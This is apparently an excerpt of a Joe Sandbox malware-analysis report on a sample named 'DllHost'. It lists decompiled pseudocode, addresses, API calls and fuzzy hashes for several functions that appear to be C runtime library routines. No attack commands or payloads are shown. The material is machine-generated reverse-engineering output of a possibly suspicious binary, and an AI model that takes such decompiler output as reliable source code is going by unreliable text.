				if (_t72 == 0) goto 0x191edba2;
				_t106 = _t72 + _t136 * 8;
				_t137 = _t142;
				_v96 = _t106;
				_a32 = _t106;
				if (_t142 == _t130) goto 0x191edb99;
				_v104 = _t80 - _t142;
				_t132 = _t113 + 1;
				if ( *((intOrPtr*)( *_t137 + _t132)) != dil) goto 0x191edb53;
				_t133 = _t132 + 1;
				if (E00007FF77FF7191F4418(_t106, _t80, _t106, _t106 - _t106 + _a24,  *_t137, _t133) != 0) goto 0x191edbfc;
				_t74 = _a32;
				 *((long long*)(_v104 + _t137)) = _t74;
				_a32 = _t74 + _t133;
				if (_t137 + 8 != _t130) goto 0x191edb4d;
				 *_a16 = _t80;
				E00007FF77FF7191E6B28(_a16, _v104);
				_t85 =  >  ? _t110 : _t130 - _t142 + 7 >> 3;
				if (_t85 == 0) goto 0x191edbda;
				E00007FF77FF7191E6B28(_a16,  *_t142);
				if (_t110 + 1 != _t85) goto 0x191edbc6;
				E00007FF77FF7191E6B28(_a16, _t142);
				return 0;
			}





























                                                                                                                                                              0x7ff7191eda08
                                                                                                                                                              0x7ff7191eda0d
                                                                                                                                                              0x7ff7191eda2c
                                                                                                                                                              0x7ff7191eda2e
                                                                                                                                                              0x7ff7191eda33
                                                                                                                                                              0x7ff7191eda36
                                                                                                                                                              0x7ff7191eda38
                                                                                                                                                              0x7ff7191eda3f
                                                                                                                                                              0x7ff7191eda44
                                                                                                                                                              0x7ff7191eda47
                                                                                                                                                              0x7ff7191eda4a
                                                                                                                                                              0x7ff7191eda4d
                                                                                                                                                              0x7ff7191eda52
                                                                                                                                                              0x7ff7191eda59
                                                                                                                                                              0x7ff7191eda5f
                                                                                                                                                              0x7ff7191eda68
                                                                                                                                                              0x7ff7191eda6c
                                                                                                                                                              0x7ff7191eda77
                                                                                                                                                              0x7ff7191eda7d
                                                                                                                                                              0x7ff7191eda82
                                                                                                                                                              0x7ff7191eda87
                                                                                                                                                              0x7ff7191eda90
                                                                                                                                                              0x7ff7191eda99
                                                                                                                                                              0x7ff7191edaa2
                                                                                                                                                              0x7ff7191edaac
                                                                                                                                                              0x7ff7191edab1
                                                                                                                                                              0x7ff7191edab8
                                                                                                                                                              0x7ff7191edac2
                                                                                                                                                              0x7ff7191edac6
                                                                                                                                                              0x7ff7191edad3
                                                                                                                                                              0x7ff7191edae1
                                                                                                                                                              0x7ff7191edae5
                                                                                                                                                              0x7ff7191edaec
                                                                                                                                                              0x7ff7191edaf4
                                                                                                                                                              0x7ff7191edafb
                                                                                                                                                              0x7ff7191edb0d
                                                                                                                                                              0x7ff7191edb0f
                                                                                                                                                              0x7ff7191edb13
                                                                                                                                                              0x7ff7191edb1f
                                                                                                                                                              0x7ff7191edb24
                                                                                                                                                              0x7ff7191edb2a
                                                                                                                                                              0x7ff7191edb2c
                                                                                                                                                              0x7ff7191edb30
                                                                                                                                                              0x7ff7191edb33
                                                                                                                                                              0x7ff7191edb3a
                                                                                                                                                              0x7ff7191edb41
                                                                                                                                                              0x7ff7191edb49
                                                                                                                                                              0x7ff7191edb53
                                                                                                                                                              0x7ff7191edb5a
                                                                                                                                                              0x7ff7191edb5f
                                                                                                                                                              0x7ff7191edb73
                                                                                                                                                              0x7ff7191edb79
                                                                                                                                                              0x7ff7191edb85
                                                                                                                                                              0x7ff7191edb90
                                                                                                                                                              0x7ff7191edb97
                                                                                                                                                              0x7ff7191edb9f
                                                                                                                                                              0x7ff7191edba4
                                                                                                                                                              0x7ff7191edbbd
                                                                                                                                                              0x7ff7191edbc4
                                                                                                                                                              0x7ff7191edbc9
                                                                                                                                                              0x7ff7191edbd8
                                                                                                                                                              0x7ff7191edbdd
                                                                                                                                                              0x7ff7191edbfb

                                                                                                                                                              APIs
                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7191EDA38
                                                                                                                                                                • Part of subcall function 00007FF7191DA628: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7191DA5D5), ref: 00007FF7191DA631
                                                                                                                                                                • Part of subcall function 00007FF7191DA628: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7191DA5D5), ref: 00007FF7191DA656
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                                                                                                                              • String ID: *?
                                                                                                                                                              • API String ID: 4036615347-2564092906
                                                                                                                                                              • Opcode ID: e9a8d16d8d9306b59fbbc6ee4d230992ce33452a15bed992a440163b9c1d0acf
                                                                                                                                                              • Instruction ID: 03d5f5dbed6c894bef035a904c36f8869b7a063ee858df2e675ba4a850cd9428
                                                                                                                                                              • Opcode Fuzzy Hash: e9a8d16d8d9306b59fbbc6ee4d230992ce33452a15bed992a440163b9c1d0acf
                                                                                                                                                              • Instruction Fuzzy Hash: C651F86AB14F5586FF11EFA5A8004ADA7B4FB44BE8BC44535DE0D17B84EE7CD08A9320
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C36A0 Relevance: 3.5, APIs: 2, Instructions: 458COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                              			E00007FF77FF7191C36A0(void* __esi, long long __rbx, void* __rcx, long long __rdx, void* __r8, long long __r9) {
				void* __rdi;
				void* __rsi;
				void* __r12;
				void* __r14;
				void* __r15;
				signed int _t64;
				void* _t85;
				long long _t86;
				void* _t88;
				void* _t89;
				signed int _t99;
				void* _t105;
				void* _t106;
				intOrPtr _t108;
				void* _t110;
				signed long long _t128;
				signed long long _t129;
				void* _t134;
				void* _t146;
				long long _t149;
				intOrPtr _t162;
				char* _t165;
				short* _t166;
				intOrPtr _t169;
				void* _t172;
				void* _t174;
				void* _t176;
				void* _t180;
				void* _t181;
				void* _t183;
				signed long long _t184;
				void* _t194;
				void* _t195;
				void* _t197;
				void* _t200;
				long long _t201;
				void* _t203;
				long long _t204;

				_t106 = __esi;
				 *((long long*)(_t183 + 8)) = __rbx;
				_t181 = _t183 - 0x17;
				_t184 = _t183 - 0xa0;
				asm("movaps [esp+0x90], xmm6");
				_t128 =  *0x192190a0; // 0x590452ce5669
				_t129 = _t128 ^ _t184;
				 *(_t181 - 1) = _t129;
				_t201 = __r9;
				_t204 = __rdx;
				_t195 = __rcx;
				 *((long long*)(_t181 - 0x29)) = __rdx;
				 *((long long*)(_t181 - 0x19)) = __rdx;
				r9d = 0xf;
				 *((long long*)(_t181 - 0x11)) = __r9;
				 *((char*)(_t181 - 0x29)) = 0;
				_t64 =  *(__r9 + 0x18) & 0x00003000;
				asm("movsd xmm6, [ebp+0x7f]");
				if (_t64 != 0x3000) goto 0x191c3713;
				goto 0x191c378a;
				_t108 =  *((intOrPtr*)(__r9 + 0x20));
				if (_t108 <= 0) goto 0x191c3720;
				goto 0x191c3734;
				if (_t108 != 0) goto 0x191c372f;
				if (_t64 != 0) goto 0x191c372b;
				goto 0x191c378a;
				goto 0x191c3734;
				_t110 = _t64 - 0x2000;
				if (_t110 != 0) goto 0x191c378a;
				asm("movaps xmm0, xmm6");
				asm("andps xmm0, [0x363f8]");
				asm("comisd xmm0, [0x363e0]");
				if (_t110 <= 0) goto 0x191c378a;
				asm("movaps xmm0, xmm6");
				E00007FF77FF7191DBF04(6, _t181 - 0x49,  *((intOrPtr*)(__r9 + 0x20)));
				asm("cdq");
				_t162 =  *((intOrPtr*)(_t181 - 0x19));
				_t149 = 6 + _t129 + 0x32;
				if (_t149 - _t162 > 0) goto 0x191c37aa;
				 *((long long*)(_t181 - 0x19)) = _t149;
				_t131 =  >=  ?  *((void*)(_t181 - 0x29)) : _t181 - 0x29;
				 *((char*)(( >=  ?  *((void*)(_t181 - 0x29)) : _t181 - 0x29) + _t149)) = 0;
				goto 0x191c37f9;
				_t174 = _t149 - _t162;
				if (_t174 -  *((intOrPtr*)(_t181 - 0x11)) - _t162 > 0) goto 0x191c37e2;
				 *((long long*)(_t181 - 0x19)) = _t149;
				_t145 =  >=  ?  *((void*)(_t181 - 0x29)) : _t181 - 0x29;
				_t146 = ( >=  ?  *((void*)(_t181 - 0x29)) : _t181 - 0x29) + _t162;
				E00007FF77FF7191D4A30(_t129, 0, _t146, _t162, _t174);
				 *((char*)(_t146 + _t174)) = 0;
				goto 0x191c37f9;
				 *((char*)(_t184 + 0x20)) = 0;
				r8d = 0;
				E00007FF77FF7191BCDE0(_t181 - 0x29, _t174, _t174, _t174, _t195, _t201, _t204, _t203);
				r8d =  *(_t201 + 0x18);
				 *((char*)(_t181 - 9)) = 0x25;
				_t78 =  !=  ? 0x2b :  *(_t181 - 8) & 0x000000ff;
				 *(_t181 - 8) =  !=  ? 0x2b :  *(_t181 - 8) & 0x000000ff;
				_t134 = _t181 - 7;
				asm("inc ecx");
				_t165 =  <  ? _t134 : _t181 - 8;
				if ((r8b & 0x00000010) == 0) goto 0x191c3833;
				 *_t165 = 0x23;
				_t166 = _t165 + 1;
				 *_t166 = 0x2a2e;
				_t99 = r8d & 0x00003000;
				if ((r8b & 0x00000004) == 0) goto 0x191c386a;
				if (_t99 != 0x2000) goto 0x191c3853;
				goto 0x191c3897;
				if (_t99 != 0x3000) goto 0x191c385f;
				goto 0x191c3897;
				_t42 = _t134 - 2; // 0x45
				r8d = _t42;
				goto 0x191c388d;
				if (_t99 != 0x2000) goto 0x191c3876;
				goto 0x191c3897;
				if (_t99 != 0x3000) goto 0x191c3882;
				goto 0x191c3897;
				r8d = 0x65;
				_t85 =  ==  ? r8d : 0x67;
				 *((char*)(_t166 + 2)) = 0x61;
				 *((char*)(_t166 + 3)) = 0;
				_t153 =  >=  ?  *((void*)(_t181 - 0x29)) : _t181 - 0x29;
				asm("movsd [esp+0x20], xmm6");
				r9d = _t106;
				_t86 = E00007FF77FF7191C54A0(_t134,  >=  ?  *((void*)(_t181 - 0x29)) : _t181 - 0x29,  *((intOrPtr*)(_t181 - 0x19)), _t181 - 9, _t174, _t200);
				asm("inc ecx");
				asm("movaps [ebp-0x39], xmm0");
				_t136 =  >=  ?  *((void*)(_t181 - 0x29)) : _t181 - 0x29;
				 *((long long*)(_t184 + 0x30)) = _t86;
				 *((long long*)(_t184 + 0x28)) =  >=  ?  *((void*)(_t181 - 0x29)) : _t181 - 0x29;
				 *((char*)(_t184 + 0x20)) =  *(_t181 + 0x77) & 0x000000ff;
				_t88 = E00007FF77FF7191C1F00(_t129 + 1, 0x2b, _t105, _t146, _t204, _t181 - 0x39, _t201);
				_t169 =  *((intOrPtr*)(_t181 - 0x11));
				if (_t169 - 0x10 < 0) goto 0x191c3938;
				if (_t169 + 1 - 0x1000 < 0) goto 0x191c3933;
				if ( *((intOrPtr*)(_t181 - 0x29)) -  *((intOrPtr*)( *((intOrPtr*)(_t181 - 0x29)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191c396a;
				0x191d23d0(_t197, _t194, _t172, _t176, _t180);
				_t89 = E00007FF77FF7191D23B0(_t88, _t99,  *(_t181 - 1) ^ _t184);
				asm("movaps xmm6, [esp+0x90]");
				return _t89;
			}









































                                                                                                                                                              0x7ff7191c36a0
                                                                                                                                                              0x7ff7191c36a0
                                                                                                                                                              0x7ff7191c36b0
                                                                                                                                                              0x7ff7191c36b5
                                                                                                                                                              0x7ff7191c36bc
                                                                                                                                                              0x7ff7191c36c4
                                                                                                                                                              0x7ff7191c36cb
                                                                                                                                                              0x7ff7191c36ce
                                                                                                                                                              0x7ff7191c36d2
                                                                                                                                                              0x7ff7191c36d8
                                                                                                                                                              0x7ff7191c36db
                                                                                                                                                              0x7ff7191c36e0
                                                                                                                                                              0x7ff7191c36e4
                                                                                                                                                              0x7ff7191c36e8
                                                                                                                                                              0x7ff7191c36ee
                                                                                                                                                              0x7ff7191c36f2
                                                                                                                                                              0x7ff7191c36f9
                                                                                                                                                              0x7ff7191c36fe
                                                                                                                                                              0x7ff7191c3708
                                                                                                                                                              0x7ff7191c3711
                                                                                                                                                              0x7ff7191c3717
                                                                                                                                                              0x7ff7191c371a
                                                                                                                                                              0x7ff7191c371e
                                                                                                                                                              0x7ff7191c3720
                                                                                                                                                              0x7ff7191c3724
                                                                                                                                                              0x7ff7191c3729
                                                                                                                                                              0x7ff7191c372d
                                                                                                                                                              0x7ff7191c3737
                                                                                                                                                              0x7ff7191c373c
                                                                                                                                                              0x7ff7191c373e
                                                                                                                                                              0x7ff7191c3741
                                                                                                                                                              0x7ff7191c3748
                                                                                                                                                              0x7ff7191c3750
                                                                                                                                                              0x7ff7191c3756
                                                                                                                                                              0x7ff7191c3759
                                                                                                                                                              0x7ff7191c3761
                                                                                                                                                              0x7ff7191c3786
                                                                                                                                                              0x7ff7191c378a
                                                                                                                                                              0x7ff7191c3791
                                                                                                                                                              0x7ff7191c3793
                                                                                                                                                              0x7ff7191c379f
                                                                                                                                                              0x7ff7191c37a4
                                                                                                                                                              0x7ff7191c37a8
                                                                                                                                                              0x7ff7191c37ad
                                                                                                                                                              0x7ff7191c37b9
                                                                                                                                                              0x7ff7191c37bb
                                                                                                                                                              0x7ff7191c37c7
                                                                                                                                                              0x7ff7191c37cc
                                                                                                                                                              0x7ff7191c37d7
                                                                                                                                                              0x7ff7191c37dc
                                                                                                                                                              0x7ff7191c37e0
                                                                                                                                                              0x7ff7191c37e2
                                                                                                                                                              0x7ff7191c37ea
                                                                                                                                                              0x7ff7191c37f4
                                                                                                                                                              0x7ff7191c37f9
                                                                                                                                                              0x7ff7191c37fd
                                                                                                                                                              0x7ff7191c3810
                                                                                                                                                              0x7ff7191c3813
                                                                                                                                                              0x7ff7191c381a
                                                                                                                                                              0x7ff7191c381e
                                                                                                                                                              0x7ff7191c3823
                                                                                                                                                              0x7ff7191c382b
                                                                                                                                                              0x7ff7191c382d
                                                                                                                                                              0x7ff7191c3830
                                                                                                                                                              0x7ff7191c3833
                                                                                                                                                              0x7ff7191c383b
                                                                                                                                                              0x7ff7191c3845
                                                                                                                                                              0x7ff7191c384d
                                                                                                                                                              0x7ff7191c3851
                                                                                                                                                              0x7ff7191c3859
                                                                                                                                                              0x7ff7191c385d
                                                                                                                                                              0x7ff7191c3864
                                                                                                                                                              0x7ff7191c3864
                                                                                                                                                              0x7ff7191c3868
                                                                                                                                                              0x7ff7191c3870
                                                                                                                                                              0x7ff7191c3874
                                                                                                                                                              0x7ff7191c387c
                                                                                                                                                              0x7ff7191c3880
                                                                                                                                                              0x7ff7191c3887
                                                                                                                                                              0x7ff7191c3893
                                                                                                                                                              0x7ff7191c3897
                                                                                                                                                              0x7ff7191c389a
                                                                                                                                                              0x7ff7191c38a7
                                                                                                                                                              0x7ff7191c38ac
                                                                                                                                                              0x7ff7191c38b2
                                                                                                                                                              0x7ff7191c38bd
                                                                                                                                                              0x7ff7191c38c5
                                                                                                                                                              0x7ff7191c38ca
                                                                                                                                                              0x7ff7191c38d7
                                                                                                                                                              0x7ff7191c38dc
                                                                                                                                                              0x7ff7191c38e1
                                                                                                                                                              0x7ff7191c38ea
                                                                                                                                                              0x7ff7191c38fb
                                                                                                                                                              0x7ff7191c3901
                                                                                                                                                              0x7ff7191c3909
                                                                                                                                                              0x7ff7191c391c
                                                                                                                                                              0x7ff7191c3931
                                                                                                                                                              0x7ff7191c3933
                                                                                                                                                              0x7ff7191c3942
                                                                                                                                                              0x7ff7191c394f
                                                                                                                                                              0x7ff7191c3969

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3668304517-0
                                                                                                                                                              • Opcode ID: 50b96144bf4257b6b2c7d133c02794cf36533ce2a4ecf8d490930fcf58047179
                                                                                                                                                              • Instruction ID: 3dcb60061f4cf4215443c9d3678c860de745fce71c852a709a11260198a7613f
                                                                                                                                                              • Opcode Fuzzy Hash: 50b96144bf4257b6b2c7d133c02794cf36533ce2a4ecf8d490930fcf58047179
                                                                                                                                                              • Instruction Fuzzy Hash: D1022322B28E8589FB159F65E4503FDA7B1AB487ACF804131DE4D17B85DE2CD68BD320
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191EA080 Relevance: 3.2, APIs: 2, Instructions: 232COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionRaise_clrfp
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 15204871-0
                                                                                                                                                              • Opcode ID: cba3162a09fe4983096404d1df53aa433ccb9d1dae43158a2c1256c1592d08d7
                                                                                                                                                              • Instruction ID: 949aec16ede4dba2b6aab47cd43d5d53fd3c0c9eeb9ae139b58be24ca46229d5
                                                                                                                                                              • Opcode Fuzzy Hash: cba3162a09fe4983096404d1df53aa433ccb9d1dae43158a2c1256c1592d08d7
                                                                                                                                                              • Instruction Fuzzy Hash: FDB17C73A00B458BEB1ACF29D88626C77B0F784B9CF548821DA5D937A4CB39D896D710
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E3318 Relevance: 2.8, Strings: 2, Instructions: 270COMMONLIBRARYCODECrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                              			E00007FF77FF7191E3318(void* __esi, short* __rcx, long long __rdx, signed int __r8, void* __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t47;
				void* _t52;
				signed int _t68;
				signed int _t69;
				void* _t80;
				void* _t82;
				signed long long _t101;
				signed long long _t102;
				signed short* _t105;
				signed short* _t107;
				signed long long _t111;
				signed long long _t112;
				signed long long _t114;
				short* _t138;
				void* _t139;
				void* _t140;
				void* _t141;
				signed long long _t142;
				intOrPtr* _t158;
				signed short* _t159;
				void* _t160;
				signed long long _t162;
				long long _t163;

				_t155 = __r9;
				_t140 = _t141 - 0x148;
				_t142 = _t141 - 0x248;
				_t101 =  *0x192190a0; // 0x590452ce5669
				_t102 = _t101 ^ _t142;
				 *(_t140 + 0x130) = _t102;
				_t158 =  *((intOrPtr*)(_t140 + 0x1b8));
				r14d = 0;
				 *((long long*)(_t142 + 0x50)) = __rdx;
				 *((long long*)(_t142 + 0x58)) = __r8;
				_t139 = __r9;
				_t163 = __rdx;
				_t138 = __rcx;
				if (__rcx == 0) goto 0x191e3591;
				E00007FF77FF7191E5AC4(_t102, __r8, __rdx, __r9);
				_t7 = _t160 + 0x55; // 0x55
				r9d = _t7;
				 *((intOrPtr*)(_t142 + 0x30)) = r14d;
				_t9 = _t102 + 0xb8; // 0xb8
				 *((long long*)(_t142 + 0x38)) = _t9;
				_t11 = _t102 + 0x1c2; // 0x1c2
				_t159 = _t11;
				_t12 = _t102 + 0xbc; // 0xbc
				_t103 = _t102 + 0x2f0;
				 *((long long*)(_t142 + 0x40)) = _t12;
				 *((long long*)(_t142 + 0x48)) = _t102 + 0x2f0;
				if (E00007FF77FF7191EF3D4(_t102 + 0x2f0, __r8, __r9,  *((intOrPtr*)(_t140 + 0x1b0)), _t102 + 0x2f0, __r9) != 0) goto 0x191e36d0;
				if ( *_t138 != 0x43) goto 0x191e33fb;
				if ( *((intOrPtr*)(_t138 + 2)) != 0) goto 0x191e33fb;
				if (E00007FF77FF7191EB1AC(_t103, _t163, __r8, 0x192070a0) != 0) goto 0x191e36d0;
				if (_t158 == 0) goto 0x191e33f3;
				 *_t158 = 0;
				goto 0x191e3593;
				_t111 = __r8 | 0xffffffff;
				_t162 = _t111 + 1;
				if ( *((intOrPtr*)(_t138 + _t162 * 2)) != 0) goto 0x191e3402;
				_t80 = _t162 - 0x83;
				if (_t80 >= 0) goto 0x191e3461;
				_t105 = _t159;
				_t68 =  *(_t105 + _t138 - _t159) & 0x0000ffff;
				if (_t80 != 0) goto 0x191e3432;
				if (_t68 != 0) goto 0x191e341e;
				_t82 = ( *_t105 & 0x0000ffff) - _t68;
				if (_t82 == 0) goto 0x191e367b;
				_t107 =  *((intOrPtr*)(_t142 + 0x40));
				_t69 =  *(_t107 + _t138 - _t107) & 0x0000ffff;
				if (_t82 != 0) goto 0x191e3459;
				if (_t69 != 0) goto 0x191e3445;
				if (( *_t107 & 0x0000ffff) - _t69 == 0) goto 0x191e367b;
				_t47 = E00007FF77FF7191E7EF8(( *_t107 & 0x0000ffff) - _t69,  &(_t107[1]));
				r15d = 0;
				r15b = _t47 == 0;
				if (E00007FF77FF7191E3070( &(_t107[1]), _t111, _t142 + 0x60, _t138, _t139, _t138 - _t107) != 0) goto 0x191e3503;
				if (r15d == 0) goto 0x191e34a2;
				E00007FF77FF7191F19BC(0, _t69, _t142 + 0x60,  *((intOrPtr*)(_t142 + 0x38)), _t142 + 0x60, _t155);
				goto 0x191e34a7;
				if (E00007FF77FF7191F0F88(0, _t69, _t111, _t142 + 0x60,  *((intOrPtr*)(_t142 + 0x38)), _t138, _t139, _t142 + 0x60, _t155) == 0) goto 0x191e3508;
				E00007FF77FF7191E2FCC(_t111, _t159,  *((intOrPtr*)(_t142 + 0x38)), _t139, _t142 + 0x60);
				r15d = 0;
				if (_t139 == 0) goto 0x191e34fa;
				_t109 = _t140 + 0x80;
				_t112 = _t111 + 1;
				if ( *((intOrPtr*)(_t140 + 0x80 + _t112 * 2)) != r15w) goto 0x191e34ce;
				_t30 = _t112 + 1; // 0x2
				_t52 = E00007FF77FF7191EF3D4(_t140 + 0x80, _t112, _t139,  *((intOrPtr*)(_t140 + 0x1b0)), _t140 + 0x80, _t30);
				if (_t52 != 0) goto 0x191e36e5;
				_t32 = _t162 + 1; // 0x2
				goto 0x191e3645;
				if (_t162 - 0x83 >= 0) goto 0x191e36a9;
				if ( *((intOrPtr*)(_t142 + 0x60)) == 0) goto 0x191e36a9;
				E00007FF77FF7191E7D04();
				if (_t52 == 0) goto 0x191e36a9;
				if ( *((intOrPtr*)(_t140 + 0x60)) == 0) goto 0x191e35b6;
				if (E00007FF77FF7191D87A4(_t140 + 0x80, _t140 + 0x60) == 0) goto 0x191e35da;
				if (E00007FF77FF7191D87A4(_t109, _t140 + 0x60) == 0) goto 0x191e35da;
				r15d = 0;
				_t114 = _t32 + 1;
				if ( *((intOrPtr*)(_t139 + _t114 * 2)) != r15w) goto 0x191e3569;
				_t42 = _t114 + 1; // 0x2
				if (E00007FF77FF7191EF3D4(_t109, _t114,  *((intOrPtr*)(_t142 + 0x48)), L"utf-8", _t139, _t42) != 0) goto 0x191e36e5;
				return E00007FF77FF7191D23B0(0, 0,  *(_t140 + 0x130) ^ _t142);
			}






























                                                                                                                                                              0x7ff7191e3318
                                                                                                                                                              0x7ff7191e3325
                                                                                                                                                              0x7ff7191e332d
                                                                                                                                                              0x7ff7191e3334
                                                                                                                                                              0x7ff7191e333b
                                                                                                                                                              0x7ff7191e333e
                                                                                                                                                              0x7ff7191e3345
                                                                                                                                                              0x7ff7191e334c
                                                                                                                                                              0x7ff7191e334f
                                                                                                                                                              0x7ff7191e3357
                                                                                                                                                              0x7ff7191e335c
                                                                                                                                                              0x7ff7191e335f
                                                                                                                                                              0x7ff7191e3362
                                                                                                                                                              0x7ff7191e3368
                                                                                                                                                              0x7ff7191e336e
                                                                                                                                                              0x7ff7191e337a
                                                                                                                                                              0x7ff7191e337a
                                                                                                                                                              0x7ff7191e337e
                                                                                                                                                              0x7ff7191e3383
                                                                                                                                                              0x7ff7191e338a
                                                                                                                                                              0x7ff7191e338f
                                                                                                                                                              0x7ff7191e338f
                                                                                                                                                              0x7ff7191e3396
                                                                                                                                                              0x7ff7191e339d
                                                                                                                                                              0x7ff7191e33a3
                                                                                                                                                              0x7ff7191e33ae
                                                                                                                                                              0x7ff7191e33bc
                                                                                                                                                              0x7ff7191e33c6
                                                                                                                                                              0x7ff7191e33cc
                                                                                                                                                              0x7ff7191e33e4
                                                                                                                                                              0x7ff7191e33ed
                                                                                                                                                              0x7ff7191e33ef
                                                                                                                                                              0x7ff7191e33f6
                                                                                                                                                              0x7ff7191e33fb
                                                                                                                                                              0x7ff7191e3402
                                                                                                                                                              0x7ff7191e340a
                                                                                                                                                              0x7ff7191e340c
                                                                                                                                                              0x7ff7191e3413
                                                                                                                                                              0x7ff7191e3418
                                                                                                                                                              0x7ff7191e3421
                                                                                                                                                              0x7ff7191e3428
                                                                                                                                                              0x7ff7191e3430
                                                                                                                                                              0x7ff7191e3432
                                                                                                                                                              0x7ff7191e3434
                                                                                                                                                              0x7ff7191e343a
                                                                                                                                                              0x7ff7191e3448
                                                                                                                                                              0x7ff7191e344f
                                                                                                                                                              0x7ff7191e3457
                                                                                                                                                              0x7ff7191e345b
                                                                                                                                                              0x7ff7191e3461
                                                                                                                                                              0x7ff7191e346b
                                                                                                                                                              0x7ff7191e3475
                                                                                                                                                              0x7ff7191e3482
                                                                                                                                                              0x7ff7191e3499
                                                                                                                                                              0x7ff7191e349b
                                                                                                                                                              0x7ff7191e34a0
                                                                                                                                                              0x7ff7191e34ab
                                                                                                                                                              0x7ff7191e34ba
                                                                                                                                                              0x7ff7191e34bf
                                                                                                                                                              0x7ff7191e34c5
                                                                                                                                                              0x7ff7191e34c7
                                                                                                                                                              0x7ff7191e34ce
                                                                                                                                                              0x7ff7191e34d6
                                                                                                                                                              0x7ff7191e34df
                                                                                                                                                              0x7ff7191e34ed
                                                                                                                                                              0x7ff7191e34f4
                                                                                                                                                              0x7ff7191e34fa
                                                                                                                                                              0x7ff7191e34fe
                                                                                                                                                              0x7ff7191e350f
                                                                                                                                                              0x7ff7191e351a
                                                                                                                                                              0x7ff7191e3525
                                                                                                                                                              0x7ff7191e352e
                                                                                                                                                              0x7ff7191e3538
                                                                                                                                                              0x7ff7191e354c
                                                                                                                                                              0x7ff7191e3564
                                                                                                                                                              0x7ff7191e3566
                                                                                                                                                              0x7ff7191e3569
                                                                                                                                                              0x7ff7191e3571
                                                                                                                                                              0x7ff7191e3578
                                                                                                                                                              0x7ff7191e358b
                                                                                                                                                              0x7ff7191e35b5

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast_invalid_parameter_noinfo
                                                                                                                                                              • String ID: utf-8$utf8
                                                                                                                                                              • API String ID: 456469569-782216586
